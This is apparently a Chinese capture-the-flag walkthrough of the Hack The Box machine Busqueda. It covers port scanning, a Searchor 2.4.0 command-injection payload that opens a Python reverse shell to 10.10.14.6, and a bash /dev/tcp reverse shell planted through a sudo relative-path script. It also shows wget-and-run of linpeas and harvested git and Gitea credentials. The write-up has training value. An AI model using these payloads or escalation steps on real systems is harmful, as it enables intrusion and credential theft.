Busqueda(Docker信息搜集)

10.10.11.208

1
2
3
4
5
6
7
8
9
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

echo “10.10.11.208 searcher.htb” >> /etc/hosts

http://searcher.htb/

gobuster dir -u http://searcher.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k

flask是什么

flask是一个基于python的web框架

searchor 2.4.0

https://security.snyk.io/package/pip/searchor/2.4.0

https://github.com/jonnyzar/POC-Searchor-2.4.2/blob/main/README.md

存在任意命令执行

image-20230607172959393

‘, exec(“import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘10.10.14.6’,9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/sh’,’-i’]);”))#

image-20230607174036438

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

准备提权

cd /home/kali/Desktop/htb/10.10.11.208

cp /pentest/priv/PEASS-ng/linPEAS/linpeas.sh .

python3 -m http.server 80

【getshell运行】cd /tmp;wget http://10.10.14.6/linpeas.sh;chmod +x linpeas.sh;./linpeas.sh > out.txt

信息搜集:/var/www/app/app.py

cat /etc/hosts

echo 10.10.11.208 gitea.searcher.htb >> /etc/hosts

发现一个新的网站

http://gitea.searcher.htb/

image-20230607183236319

find / -name “config” 2>/dev/null

image-20230607183655391

1
2
3
4
5
6
7
8
9
10
11
12
13
cat /var/www/app/.git/config
cat /var/www/app/.git/config                                                                                                                                                                           
[core]                                                                                                                                                                                                 
        repositoryformatversion = 0                                                                                                                                                                    
        filemode = true                                                                                                                                                                                
        bare = false                                                                                                                                                                                   
        logallrefupdates = true                                                                                                                                                                        
[remote "origin"]                                                                                                                                                                                      
        url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git                                                                                                                
        fetch = +refs/heads/*:refs/remotes/origin/*                                                                                                                                                    
[branch "main"]                                                                                                                                                                                        
        remote = origin                                                                                                                                                                                
        merge = refs/heads/main

image-20230607183828966

尝试使用密码登陆,发现此密码jh1usoih2bkjaspwe92是svc用户的正确密码

image-20230607184143303

1
2
3
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' gitea

image-20230607184623136

信息搜集,发现提权脚本

使用找到的口令登陆:http://gitea.searcher.htb/user/login

administrator
yuiu1hoiu4i5ho1uh

查看administrator此用户的脚本,可以用full-checkup.sh来提权
原理是该用户可以用root权限运行system-checkup.py,而该脚本可以运行full-checkup.sh
因此使用相对路径提权的手法,伪造full-checkup.sh进行反弹shell

1
2
User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

cd /tmp

1
2
echo \#\!/bin/bash > full-checkup.sh
echo "bash -i >& /dev/tcp/10.10.14.6/4444 0>&1 " >> full-checkup.sh

image-20230607201500918